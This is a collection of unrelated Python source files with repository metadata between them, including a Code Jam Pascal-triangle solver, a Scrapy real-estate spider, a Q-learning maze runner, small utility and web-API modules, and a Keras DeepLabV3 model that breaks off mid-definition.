    """Backtracking search from cell (r, k) for a continuation of
    output_steps whose cumulative score reaches exactly `target`.

    Mutates output_steps/visited in place while exploring; returns the
    completed step list on success, or None when no extension from this
    state works (or when the 500-step limit is hit).
    """
    # Problem limit: paths longer than 500 steps are not allowed.
    if len(output_steps) >= 500:
        print(output_steps)
        return
    next_steps = get_next_steps(r, k)
    for next_step in next_steps:
        if next_step not in visited:
            score = get_score(next_step[0], next_step[1])
            current_cum_score = cum_score + score
            if current_cum_score == target:
                output_steps.append(next_step)
                return output_steps
            if current_cum_score <= target:
                # Tentatively take the step, recurse, and undo on failure.
                output_steps.append(next_step)
                visited[next_step] = 1
                output = recur(
                    r=next_step[0],
                    k=next_step[1],
                    output_steps=output_steps,
                    visited=visited,
                    cum_score=current_cum_score,
                    target=target,
                )
                if output is not None:
                    return output
                output_steps.pop(-1)
                visited.pop(next_step)
    return
def get_next_steps(r, k):
# (ri - 1, ki - 1), (ri - 1, ki), (ri, ki - 1), (ri, ki + 1), (ri + 1, ki), (ri + 1, ki + 1).
output_steps = set()
for x, y in [(r - 1, k - 1), (r - 1, k), (r, k - 1),
(r, k + 1), (r + 1, k), (r + 1, k + 1)]:
if (x > 0) and (y <= x) and (y > 0):
output_steps.add((x, y))
return output_steps
def get_score(row, kth):
# print(row, kth, COMB[row][kth])
row_ind = row - 1
kth_ind = kth - 1
# print(row, kth, COMB[row][kth])
if COMB[row_ind][kth_ind] > 0:
# print(row, kth, COMB[row_ind][kth_ind])
return COMB[row_ind][kth_ind]
if kth - 1 < 0:
score = get_score(row - 1, kth)
else:
score = get_score(row - 1, kth - 1) + get_score(row - 1, kth)
COMB[row_ind][kth_ind] = score
# print(row, kth, score)
# print(row, kth, COMB[row_ind][kth_ind])
return score
def get_combination_number(n, k):
# C(n, k)
k = min(k, n - k)
up = 1
down = 1
for v in range(n, n - k, -1):
up *= v
for v in range(1, k + 1):
down *= v
return up / down
if __name__ == '__main__':
    MAX_STEPS = 500

    # Build the Pascal memo triangle first. The original assigned into
    # COMB inside the next loop *before* COMB was defined, which raised a
    # NameError at startup.
    COMB = []
    for i in range(MAX_STEPS):
        row = [0 for _ in range(i + 1)]
        row[0] = 1
        row[i] = 1
        COMB.append(row)

    # Per-layer maxima C(i-1, ceil(i/2)-1) and their running sum; stop once
    # the cumulative maximum exceeds the 1e9 problem bound.
    MAX_VALUE_IN_LAYER = [0 for _ in range(MAX_STEPS)]
    CUM_MAX_VALUE_IN_LAYER = [0 for _ in range(MAX_STEPS)]
    for i in range(1, MAX_STEPS + 1):
        k = math.ceil(i / 2)
        MAX_VALUE_IN_LAYER[i - 1] = get_combination_number(i - 1, k - 1)
        CUM_MAX_VALUE_IN_LAYER[i - 1] = CUM_MAX_VALUE_IN_LAYER[i - 2] + MAX_VALUE_IN_LAYER[i - 1]
        COMB[i - 1][k - 1] = MAX_VALUE_IN_LAYER[i - 1]
        if CUM_MAX_VALUE_IN_LAYER[i - 1] > 1e+9:
            break

    # Standard Code Jam I/O loop: t cases, each a target n.
    t = int(input())
    for case_i in range(1, t + 1):
        n = int(input())
        steps = p2(n)
        print("Case #{}:".format(case_i))
        for step in steps:
            print("{} {}".format(step[0], step[1]))
batulu12/ljscrapy | 15,307,263,467,061 | dd93af2710f54a021a1b3770f3f169222d14f620 | 19197d0ad1640144f1d6ddd068d63372b2222ad4 | /lj/spiders/spider.py | 42ff8c864759dd578f47bf1cc759b1de929aba6a | []
| no_license | https://github.com/batulu12/ljscrapy | c3ae3640f3f084388db622d7e16c99255f1276d8 | 282c98d9e5a1de0abf7aa4d0e6573d9659695f85 | refs/heads/master | 2021-01-23T07:20:55.992793 | 2014-11-06T07:38:31 | 2014-11-06T07:38:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from scrapy.contrib.spiders import CrawlSpider,Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from lj.items import LjItem
class lj(CrawlSpider):
name = "lj"
allowed_domains = ["beijing.homelink.com.cn"]
start_urls = ["http://beijing.homelink.com.cn/ershoufang/BJHD86983254.shtml",
"http://beijing.homelink.com.cn/ershoufang/pg2"]
rules = [Rule(SgmlLinkExtractor(allow=('/ershoufang/[^/]+.shtml')), callback = 'myparse'),
Rule(SgmlLinkExtractor(allow=('/ershoufang/pg[^/]', )), follow=True)]
def myparse(self, response):
item = LjItem()
x = HtmlXPathSelector(response)
item['url'] = response.url
strlist = x.xpath('//h1/text()').extract()
if len(strlist) > 0:
item['title'] = strlist[0]
else:
item['title'] = 'hello'
strlist = x.xpath("//div[contains(@class,'public nav')]/a/text()").extract()
if len(strlist) > 0:
item['region'] = strlist[2]
else:
item['region'] = 'region'
if len(strlist) > 0:
item['detail_region'] = strlist[3]
else:
item['detail_region'] = 'detail_region'
if len(strlist) > 0:
item['community'] = strlist[4]
else:
item['community'] = 'community'
strlist = x.xpath("//div[@class='shoujia']/ul/li/span/text()").extract()
if len(strlist) > 0:
item['price'] = strlist[0]
strlist = x.xpath("//div[@class='shoujia']/ul/li/div[@class='reduce']/div[@class='prompt']/text()").extract()
if len(strlist) > 0:
item['trend'] = strlist[0]
strlist = x.xpath("//div[@class='shoujia']/ul/li[4]/text()").extract()
if len(strlist) > 0:
item['builtarea'] = strlist[0]
return item | UTF-8 | Python | false | false | 2,021 | py | 10 | spider.py | 8 | 0.532905 | 0.520534 | 0 | 54 | 36.444444 | 117 |
anandxkumar/Maze_Solver_Using_Reinforcement_Learning | 10,316,511,463,361 | 7290e21d0f694d25e1939238fb4c6379c9b77dd3 | c4b3daa749b7d06e943c08a2e7b2fd509c831e21 | /app.py | 7f007948045d7ef85a41dad7f5c8fdc162bfa319 | []
| no_license | https://github.com/anandxkumar/Maze_Solver_Using_Reinforcement_Learning | 0c56a453377cade088fc9d18e35a565622ba3007 | 21f87066d932a62e487d18c011d005dcd2b2c178 | refs/heads/master | 2022-07-10T11:51:31.684891 | 2020-05-09T20:27:56 | 2020-05-09T20:27:56 | 262,653,231 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Interaction between agent and environment
from maze_env import Maze
from RL_agent import QlearningTable
import matplotlib
# Backend
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
episode_count = 100 # number of epochs
episodes = range(episode_count)
rewards = [] # The gained reward in each episode
movements = [] # Number of movements happened in each episode
def run_exp():
for episode in episodes:
print ("Episode {}/{}".format(episode+1, episode_count))
observation = env.reset()
moves = 0
while True :
env.render()
# Q-learning chooses action based on observation
# we convert observation to str since we want to use them as index for our DataFrame.
action = q_learning_agent.choose_action(str(observation))
# RL takes action and gets next observation and reward
observation_, reward, done = env.get_state_reward(action)
moves += 1
# RL learn from the above transition,
# Update the Q value for the given tuple
q_learning_agent.learn(str(observation), action, reward, str(observation_))
observation = observation_
if done:
movements.append(moves)
rewards.append(reward)
print("Reward : {} , Moves : {}".format(reward,moves))
break
print(" Game Over")
plot_reward_movements()
def plot_reward_movements():
plt.figure()
plt.subplot(2,1,1) # Number of rows, columns, index
#episodes = np.asarray(episodes)
#movements = np.asarray(movements)
plt.plot(episodes, movements)
plt.xlabel("Episode")
plt.ylabel("Movements")
plt.subplot(2,1,2)
plt.step(episodes,rewards)
plt.xlabel("Episode")
plt.ylabel("Reward")
plt.savefig("reward_movement_qlearning,png")
plt.show()
if __name__ == '__main__':
env = Maze()
q_learning_agent = QlearningTable(actions = list(range(env.no_action)))
# Call run_experiment() function once after given time in milliseconds.
env.window.after(10, run_exp)
env.window.mainloop()
| UTF-8 | Python | false | false | 2,385 | py | 3 | app.py | 3 | 0.57065 | 0.56478 | 0 | 75 | 29.773333 | 97 |
selahaddint/PythonLoginAPI | 9,878,424,808,875 | a6c20464bc936801a47ecc5d3a631e6a04d10bc0 | d9ce762e4aca275fbc7b281e3a561a9bb4e53ee4 | /Persistence/LoginPersistence.py | ff23cda4188a50e1c4c9fb2d6d4a6921b0476f8c | []
| no_license | https://github.com/selahaddint/PythonLoginAPI | 0b16bc417280cbdc22fe2f6dd287d42cb4e401f7 | e3bf5443253786cf295abe5a1f9c5ffec43d692b | refs/heads/master | 2020-12-24T21:28:17.926566 | 2017-06-05T11:15:14 | 2017-06-05T11:15:14 | 59,067,687 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from initialize import *
from Models.UserModel import *
import json
#---------------------------------------------------------------------------------------------------------------
class LoginPersistence():
def Login(self,user_name, password):
user = User.verify_auth_token(user_name)
if not user:
user = User.query.filter_by(Username=user_name).first()
if not user or not user.verify_password(password):
return json.dumps({'status':'NO'})
g.user = user
token = g.user.generate_auth_token(600)
return jsonify({'status':'OK', 'token': token.decode('ascii'), 'duration': 600})
def Token():
token = g.user.generate_auth_token(600)
return jsonify({'token': token.decode('ascii'), 'duration': 600})
#---------------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------------- | UTF-8 | Python | false | false | 1,303 | py | 11 | LoginPersistence.py | 9 | 0.325403 | 0.316193 | 0 | 22 | 58.272727 | 112 |
fabiankirsch/mastersthesis | 11,330,123,752,478 | 2268ec47385dd5f8c68a36ec57363a0a9ed2e7f1 | 139a1c56ae919c66a9a45108df0def5d12a51b83 | /code/normalizer.py | 0f7606641361ab2b67e6383513851eb11299ab66 | []
| no_license | https://github.com/fabiankirsch/mastersthesis | d5fb38cc065e01c19de204ac6621a69d6f2f963d | 8325da74189ab90089277e209490ab46dfef0324 | refs/heads/master | 2020-07-28T09:38:29.372542 | 2019-09-18T19:08:12 | 2019-09-18T19:08:12 | 209,382,892 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from sklearn.preprocessing import StandardScaler
def fit_standard_scaler_to_sequence_batch(X):
"""
X: 3d array containing sequences
Returns 2 arrays of means and variances
"""
X_2d = X.reshape(-1, X.shape[2])
scaler = StandardScaler().fit(X_2d)
return scaler.mean_, scaler.var_
def normalize_sequence_batch(X, means, variances):
"""
X: multivariate sequence batch (numpy 3d array)
means: array of means, one for each column. Used to for normalization
variances: array of variances, one for each column. Used for normalization
Applying normalization function on third axis of array (index 2).
Returns normalized sequence batch
"""
return np.apply_along_axis(normalize_single_observation, 2, X, means, variances)
def normalize_single_observation(X, means, variances):
return (X - means) / np.sqrt(variances)
def normalize_sequence(X, means, variances):
"""
X: single multivariate sequence (2d numpy array)
means: array of means, one for each column. Used to for normalization
variances: array of variances, one for each column. Used for normalization
Returns normalized sequence.
"""
return (X - means) / np.sqrt(variances)
| UTF-8 | Python | false | false | 1,245 | py | 67 | normalizer.py | 16 | 0.706024 | 0.697992 | 0 | 41 | 29.365854 | 84 |
pseudoPixels/SciWorCS | 14,250,701,507,936 | aabbf355e9c1091e749887f02ed8eccac26547d4 | 893f83189700fefeba216e6899d42097cc0bec70 | /app_collaborative_sci_workflow/pipeline_modules/NiCAD_abstracting/NiCAD_abstracting_settings.py | 0c3a032ba4833cfde22a577011b0dcb42220f822 | [
"MIT"
]
| permissive | https://github.com/pseudoPixels/SciWorCS | 79249198b3dd2a2653d4401d0f028f2180338371 | e1738c8b838c71b18598ceca29d7c487c76f876b | refs/heads/master | 2021-06-10T01:08:30.242094 | 2018-12-06T18:53:34 | 2018-12-06T18:53:34 | 140,774,351 | 0 | 1 | MIT | false | 2021-06-01T22:23:47 | 2018-07-12T23:33:53 | 2018-12-06T20:27:54 | 2021-06-01T22:23:45 | 593,244 | 0 | 1 | 4 | Python | false | false |
granularity = 'functions'
language = 'java'
input_source='/home/ubuntu/Webpage/app_collaborative_sci_workflow/workflow_outputs/test_workflow/filter.xml'
abstraction='none'
output_destination= '/home/ubuntu/Webpage/app_collaborative_sci_workflow/workflow_outputs/test_workflow/abstract' | UTF-8 | Python | false | false | 287 | py | 877 | NiCAD_abstracting_settings.py | 426 | 0.815331 | 0.815331 | 0 | 5 | 56.2 | 113 |
idradm/evaluation-tool | 9,637,906,633,170 | e55f7cac95089160250d76ab429fed61fb16a7ae | 816a8af104f9a68340feac749100e49085dbefef | /hlidskjalf/stats.py | 51e3064ca4e736d819e37c162348747a93cadb19 | []
| no_license | https://github.com/idradm/evaluation-tool | efe5c9cee57c000e73d7ee269615881a8ef3c713 | 2b9d16e1095f53218744496af58d5186596a4922 | refs/heads/master | 2021-01-22T22:45:03.545046 | 2014-06-27T15:11:30 | 2014-06-27T15:11:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from hlidskjalf.models import DataItem, ResultItem, Stat, Type
class Stats(object):
@staticmethod
def get(run):
stats = Stat.objects.filter(run=run)
total, found, coverage, real = (0, 0, 0, 0)
type_coverages = {}
for stat in stats:
if stat.type:
type_coverages[stat.type.name] = [
stat.found,
round((float(stat.found) / float(stat.total)) * 100, 2)
]
else:
total = stat.total
found = stat.found
coverage = round((float(found) / float(total)) * 100, 2)
if 'OK' in type_coverages:
real = round(coverage * type_coverages['OK'][1] / 100, 2)
return {
'total': total,
'found': found,
'coverage': coverage,
'real_coverage': real,
'types': type_coverages
}
@staticmethod
def calculate(run):
results = ResultItem.objects.filter(run=run)
total = len(DataItem.objects.filter(set=run.set))
found = len(results)
Stats.save(run, None, (total, found))
types = {}
for result in results:
if result.result is not None:
if result.result.type is not None:
if result.result.type.name not in types:
types[result.result.type.name] = 0
types[result.result.type.name] += 1
for type, value in types.items():
Stats.save(run, Type.objects.get(name=type), (found, value))
@staticmethod
def save(run, type, values):
(total, found) = values
stat = Stat.objects.filter(run=run, type=type)
if not stat:
stat = Stat(run=run, type=type)
else:
stat = stat[0]
stat.total = total
stat.found = found
stat.save()
| UTF-8 | Python | false | false | 1,920 | py | 23 | stats.py | 15 | 0.511458 | 0.501042 | 0 | 63 | 29.47619 | 75 |
anthon-alindada/sanic_messaging | 18,124,762,008,601 | 666c702c39a5b27271d773e41ae215a544750569 | 2c39ce33f9ba4bcc3b49af4730fdb74b010647bb | /app/domain/messaging/tests/stores/test_message_store.py | 9151596620b4c8430049439187fbb2fc8525d01c | [
"MIT"
]
| permissive | https://github.com/anthon-alindada/sanic_messaging | 967eb706368bfa10f737818d2aa2661184ad997e | 2afbc601790b4a3dbe17e0a95c589412250d8bee | refs/heads/master | 2023-01-21T07:57:47.245728 | 2019-07-05T14:52:08 | 2019-07-05T14:52:08 | 190,910,607 | 1 | 0 | MIT | false | 2023-01-14T00:39:23 | 2019-06-08T16:30:57 | 2019-07-05T14:56:59 | 2023-01-14T00:39:22 | 4,065 | 1 | 0 | 28 | Python | false | false | # -*- coding: utf-8
# Core
import pytest
# Models
from app.domain.messaging.models import Message
# Messaging context
from ... import messaging_context
@pytest.fixture
def message_store():
return messaging_context.message_store()
async def test_create(message_data, message_store):
message = await message_store.create(
content='This is a sample message',
author_id=1,
channel_id=1)
assert message.id is not None, 'Should create message'
assert isinstance(message, Message), 'Should create message'
async def test_set_content(message_data, message_store):
message = message_data[0]
message = await message_store.set_content(
message=message, content='New content')
await message_store.save()
assert message.content == 'New content', 'Should set message content'
| UTF-8 | Python | false | false | 836 | py | 96 | test_message_store.py | 83 | 0.704545 | 0.699761 | 0 | 33 | 24.333333 | 73 |
decadegraphy/decadegraphy | 18,236,431,163,559 | d16b0cdcdbe91a392e5f8fd576a877e69db2aa47 | d8cb92bb9b552fa24365ff7a6682f458ef8695e6 | /restapi/urls.py | ed343562bd37d6b7647b76ec4a51996979a98de4 | []
| no_license | https://github.com/decadegraphy/decadegraphy | ee7b7869883804399c7f08459310571c6556a7d0 | a38f29b5aea43bb4acf50d9e868dbed888636419 | refs/heads/master | 2021-01-01T18:13:05.287704 | 2018-07-21T03:42:03 | 2018-07-21T03:42:03 | 98,275,330 | 8 | 9 | null | false | 2017-09-16T03:31:34 | 2017-07-25T07:04:12 | 2017-08-31T15:48:24 | 2017-09-16T03:31:33 | 154 | 8 | 4 | 0 | Python | null | null | from rest_framework import viewsets, routers
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from works.api import WorkViewSet
class UserAuthViewSet(viewsets.ViewSet):
permission_classes = (IsAuthenticated,)
def list(self, request):
return Response({'username': request.user.username, 'id': request.user.id})
router = routers.SimpleRouter()
router.register(r'users/auth', UserAuthViewSet, base_name='users_auth')
router.register(r'works', WorkViewSet)
urlpatterns = router.urls
| UTF-8 | Python | false | false | 551 | py | 33 | urls.py | 26 | 0.778584 | 0.778584 | 0 | 17 | 31.411765 | 83 |
RamaryUp/codingame | 6,871,947,720,644 | a97898979e2ddf3ce566b82c9546ecefffd767ea | d1f5284f99f5314b31311e63f1358774ed7353cc | /Python/minimalnumberofswaps.py | 6333530dac416b70dfe21ca5d493e212ca8d21b2 | []
| no_license | https://github.com/RamaryUp/codingame | dfe699e2b5e18565562acbab6fbf0229b5de02b4 | 16fc7b907113994610ad3b72f86a1da0e700c63e | refs/heads/master | 2021-01-16T19:08:16.944425 | 2018-02-04T23:05:24 | 2018-02-04T23:05:24 | 100,143,411 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Codingame challenge
# Name : Minimal number of swaps
# Category : Community puzzles
# URL : https://www.codingame.com/training/easy/minimal-number-of-swaps
# Selected programming language : Python 3.5.3
'''
-----------------------------------------------------------------------------------
Goal
Given a list of 1 and 0, you must regroup all the 1 at the begin of the list in a minimum number of steps.
A step is the interchange of two elements located at different positions.
The expected result is the minimum number of steps required to obtain a sorted list.
Input
Line 1: an integer N.
Line 2: a list of N numbers that can take the values 0 or 1.
Output
Line 1 : The minimum number of steps to regroup all the 1 at the beginning of the list.
Constraints
1 ≤ N < 500
Example
Input
5
1 0 1 0 1
Output
1
-----------------------------------------------------------------------------------
'''
n, l = int(input()), input().split()
nb1 = l.count('1')
# The nummber of swaps required is equal to the number of "1" that are not yet grouped in the target block of "1"
nbexchanges = l[nb1:].count('1')
print(nbexchanges)
| UTF-8 | Python | false | false | 1,127 | py | 33 | minimalnumberofswaps.py | 30 | 0.623111 | 0.597333 | 0 | 37 | 29.405405 | 113 |
Mrd278/Codeforces_Java | 11,038,065,962,339 | ca6d5eb6e80f21168162116b6233e9ebc65d31ab | a1a15238fc09c8b19504deb6d2610d3d315e7430 | /ServiceLane.py | 9174576c74485205ea4cc6b404e375ce071cef93 | []
| no_license | https://github.com/Mrd278/Codeforces_Java | d84b53e1afe66dd468cb4b878be31e8e8c779e65 | b0984f2b74e3a1c75d7de3ef0b33c86dc39e8d91 | refs/heads/master | 2020-12-27T15:45:13.641177 | 2020-07-15T10:19:34 | 2020-07-15T10:19:34 | 237,956,866 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | n, t = map(int, input().split())
x = list(map(int, input().split()))
for i in range(t):
a,b = map(int, input().split())
print(min(x[a:b+1])) | UTF-8 | Python | false | false | 148 | py | 280 | ServiceLane.py | 280 | 0.547297 | 0.540541 | 0 | 5 | 28.8 | 35 |
chuzcjoe/Leetcode | 18,562,848,663,667 | ab842b457608cb4ffce2b07dadab1552928cf350 | 81b80dcb5dae151903bed55bc717942edb4ecadb | /121. Best Time to Buy and Sell Stock.py | ca1d5458f58093000d5493130352bd9fe2ea9851 | []
| no_license | https://github.com/chuzcjoe/Leetcode | 742bbb71e08ae8833865174b40e4a8f3c2529916 | a6eb22c3f84459c3c054c00aec59d0d87b685bfa | refs/heads/master | 2021-07-10T15:40:47.332063 | 2020-09-27T23:54:13 | 2020-09-27T23:54:13 | 198,936,895 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
def maxProfit(self, prices: List[int]) -> int:
left = 0
res = 0
for right in range(1,len(prices)):
while prices[left] > prices[right]:
left += 1
res = max(res, prices[right]-prices[left])
return res | UTF-8 | Python | false | false | 356 | py | 392 | 121. Best Time to Buy and Sell Stock.py | 386 | 0.418539 | 0.407303 | 0 | 14 | 23.571429 | 54 |
CarlosGAO/GetMachineinfor_py | 3,307,124,837,067 | 5d335159e5e8305d87e660c5c6c17983c31867d4 | 67ca863be8b556fbf2b81e1d3b759c1a0f4a8054 | /handlers.py | 6bd3f4910171a3af314a82e1a35013fa7a17d5ac | []
| no_license | https://github.com/CarlosGAO/GetMachineinfor_py | a89b35b5376a6ae82446c235723454145f92f0e1 | 92f4a29fb1c355c04c5cb59f28ff9c8815864683 | refs/heads/master | 2021-01-09T20:15:33.051304 | 2016-08-02T06:52:54 | 2016-08-02T06:52:54 | 64,727,092 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
from __future__ import division
class Handler():
###GET OS VERTION##########################################
def os_ver(self,datasrc):
self.f = open(datasrc, 'r')
for line in self.f:
line = line.strip()
if line.startswith('Description:'):
self.os = line.split(':')[1].strip()
else:
continue
self.f.close()
return self.os
###GET PRODUCTION INFORMATION##############################
def production_info(self,datasrc):
self.f = open(datasrc, 'r')
self.production = None
self.sn = None
for line in self.f:
line = line.strip()
if line.startswith('Product Name'):
self.production = line.split(':')[1].strip()
elif line.startswith('Serial Number'):
self.sn = line.split(':')[1].strip()
else:
continue
self.f.close()
return self.production,self.sn
###GET CPU INFORMAITON#####################################
def cpu_info(self,datasrc):
self.cpu_mod = False
self.cpu_count = 0
self.f = open(datasrc,'r')
for data in self.f:
if data.startswith('model name'):
if not self.cpu_mod:
self.cpu_mod = data.split(':')[1].strip()
self.cpu_count += 1
self.f.close()
return ''.join(self.cpu_mod.split()),int(self.cpu_count)
###GET MEMORY INFORMAITON##################################
def mem_info(self,datasrc):
self.f = open(datasrc,'r')
for line in self.f:
if line.startswith('MemTotal:'):
self.mem_total = int(line.split()[1])
elif line.startswith('MemFree:'):
self.mem_free = int(line.split()[1])
elif line.startswith('Buffers:'):
self.mem_buffers = int(line.split()[1])
elif line.startswith('Cached:'):
self.mem_cache = int(line.split()[1])
else:
continue
self.f.close()
self.usege_percent = '%.2f%%' % float((self.mem_total-self.mem_free-self.mem_buffers-self.mem_cache)/self.mem_total*100)
self.mem_total = '%.2fG' % float(self.mem_total/1024/1024)
return self.mem_total,self.usege_percent
###GET DISK INFORMATION####################################
def disk_info(self,datasrc):
self.f = open(datasrc,'r')
for line in self.f:
if line.startswith('/dev/'):
yield line.split()
else:
continue
self.f.close()
def disk_data(self,diskhandler,datasrc):
self.used_total = 0
self.disk_total = 0
for disk_data in diskhandler(datasrc):
Total = '%.2f%s' % (float(int(disk_data[1])/1024),"G")
Used = '%.2f%s' % (float(int(disk_data[2])/1024),"G")
self.used_total += float(int(disk_data[2])/1024)
self.disk_total += float(int(disk_data[1])/1024)
self.used_total = '%.2f%s' % (self.used_total,"G")
self.disk_total = '%.2f%s' % (self.disk_total,"G")
return self.used_total,self.disk_total
| UTF-8 | Python | false | false | 3,219 | py | 6 | handlers.py | 5 | 0.497049 | 0.481827 | 0 | 84 | 37.321429 | 128 |
yshenkai/DeepLabV3 | 18,777,597,050,301 | f79074214b6538a2b214d4908203f48d436dba70 | b0e71a6b8854e3c13f7b06432f9fbd626a2bdcab | /model.py | 5e8680b4f0bc2b0c21844f7daa40d2bcefe5dc41 | []
| no_license | https://github.com/yshenkai/DeepLabV3 | 3517aee142b4870ed75f44e39d471fb445fd0bc2 | 8e4ba0c4e856da109518764cae1e03b4e2a751ff | refs/heads/master | 2020-08-08T11:18:41.479909 | 2019-10-09T04:33:12 | 2019-10-09T04:33:12 | 213,820,500 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from keras.models import Model
from keras.layers import Input,Conv2D,DepthwiseConv2D,Activation,BatchNormalization,Add,Concatenate,ZeroPadding2D,Reshape,Lambda
from keras.layers import UpSampling2D,AveragePooling2D,Dropout
from keras.engine.topology import get_source_inputs
from keras import backend as K
from keras.utils.np_utils import to_categorical
from keras.optimizers import Adam
import tensorflow as tf
import numpy as np
def sparse_crossentropy_ignoring_last_label(y_true, y_pred):
y_true = y_true[:,:,:-1]
return K.categorical_crossentropy(y_true, y_pred)
def sparse_accuracy_ignoring_last_label(y_true, y_pred):
#nb_classes = K.int_shape(y_pred)[-1]
y_pred = K.reshape(y_pred, (-1, 21))
y_true=y_true[:,:,:-1]
y_true = K.argmax(K.reshape(y_true,(-1,21)),axis=-1)
legal_labels = ~K.equal(y_true, 255)
return K.sum(tf.to_float(legal_labels & K.equal(y_true,
K.argmax(y_pred, axis=-1)))) / K.sum(tf.to_float(legal_labels))
def Jaccard(y_true, y_pred):
nb_classes = K.int_shape(y_pred)[-1]
iou = []
pred_pixels = K.argmax(y_pred, axis=-1)
for i in range(0, nb_classes): # exclude first label (background) and last label (void)
true_labels = K.equal(y_true[:,:,0], i)
pred_labels = K.equal(pred_pixels, i)
inter = tf.to_int32(true_labels & pred_labels)
union = tf.to_int32(true_labels | pred_labels)
legal_batches = K.sum(tf.to_int32(true_labels), axis=1)>0
ious = K.sum(inter, axis=1)/K.sum(union, axis=1)
iou.append(K.mean(tf.gather(ious, indices=tf.where(legal_batches)))) # returns average IoU of the same objects
iou = tf.stack(iou)
legal_labels = ~tf.debugging.is_nan(iou)
iou = tf.gather(iou, indices=tf.where(legal_labels))
return K.mean(iou)
def _conv_same(x,filters,kernel_size=3,strides=1,rate=1):
if strides==1:
return Conv2D(filters=filters,kernel_size=kernel_size,strides=1,padding="same",use_bias=False,dilation_rate=rate)(x)
else:
pad_total=kernel_size+(kernel_size-1)*(rate-1)-1
pad_beg=pad_total//2
pad_end=pad_total-pad_beg
x=ZeroPadding2D(padding=(pad_beg,pad_end))(x)
return Conv2D(filters==filters,kernel_size=kernel_size,strides=strides,dilation_rate=rate,padding="valid")(x)
def _Sep_Conv_BN(x,filters,kernel_size=3,strides=1,rate=1,depth_activation=False,epilon=1e-3):
if strides==1:
depth_pad="same"
else:
pad_total=kernel_size+(kernel_size-1)*(rate-1)-1
pad_beg=pad_total//2
pad_end=pad_total-pad_beg
x=ZeroPadding2D(padding=(pad_beg,pad_end))(x)
depth_pad="valid"
if not depth_activation:
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=kernel_size,strides=strides,dilation_rate=rate,padding=depth_pad,use_bias=False)(x)
x=BatchNormalization(epsilon=epilon)(x)
if depth_activation:
x=Activation("relu")(x)
x=Conv2D(filters=filters,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=epilon)(x)
if depth_activation:
x=Activation("relu")(x)
return x
def _Xception_block(x,filters_list,kernel_size=3,strides=1,rate=1,depth_activation=False,epilon=1e-3,middle_Conv=True,return_skip=False):
middle=x
for i in range(len(filters_list)):
x=_Sep_Conv_BN(x,filters=filters_list[i],kernel_size=kernel_size,strides=strides if i ==2 else 1,rate=rate,depth_activation=depth_activation)
if return_skip & i==1:
skip=x
if middle_Conv:
middle=_conv_same(middle,filters=filters_list[-1],kernel_size=1,strides=strides,rate=rate)
middle=BatchNormalization(epsilon=epilon)(middle)
x=Add()([middle,x])
if return_skip:
return x,skip
else:
return x
def DeepLabV3(weights="pascal_voc",input_tensor=None,input_shape=(256,256,3),infer=False,classes=21):
if input_tensor is None:
input=Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
input=Input(shape=input_shape,tensor=input_tensor)
else:
input=input_tensor
#input=Input(shape=input_shape)
x=Conv2D(filters=32,kernel_size=3,strides=2,use_bias=False)(input)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=64,kernel_size=3,padding="same")(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=_Xception_block(x,filters_list=[128,128,128],kernel_size=3,strides=2,rate=1,depth_activation=False,middle_Conv=True)
x,skip=_Xception_block(x,filters_list=[256,256,256],kernel_size=3,strides=2,rate=1,depth_activation=False,middle_Conv=True,return_skip=True)
x=_Xception_block(x,filters_list=[728,728,728],kernel_size=3,strides=1,rate=1,depth_activation=False)
for i in range(16):
x=_Xception_block(x,filters_list=[728,728,728],kernel_size=3,strides=1,rate=1,depth_activation=False,middle_Conv=False)
x=_Xception_block(x,filters_list=[728,1024,1024],strides=1,kernel_size=3,rate=1,depth_activation=False)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=1536,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=1536,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=2048,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
d1=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
d1=BatchNormalization()(d1)
d1=Activation("relu")(d1)
d2=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=6,use_bias=False)(x)
d2=BatchNormalization()(d2)
d2=Activation("relu")(d2)
d2=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d2)
d2=BatchNormalization()(d2)
d2=Activation("relu")(d2)
d3=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=12,use_bias=False)(x)
d3=BatchNormalization()(d3)
d3=Activation("relu")(d3)
d3=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d3)
d3=BatchNormalization()(d3)
d3=Activation("relu")(d3)
